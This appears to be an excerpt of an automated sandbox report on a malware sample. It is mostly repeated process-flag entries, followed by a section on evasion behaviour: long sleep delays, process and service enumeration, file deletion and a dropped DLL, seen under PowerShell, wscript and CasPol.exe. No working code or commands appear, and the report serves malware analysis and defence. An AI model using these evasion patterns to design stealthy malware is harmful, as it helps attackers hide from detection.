                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198D2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7113Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2515Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3548Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6225Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 3694Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 6293Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_12-52672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 9.5 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep count: 7113 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep count: 2515 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7208Thread sleep count: 3694 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7208Thread sleep time: -11082000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7208Thread sleep count: 6293 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7208Thread sleep time: -18879000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B43F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C79
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
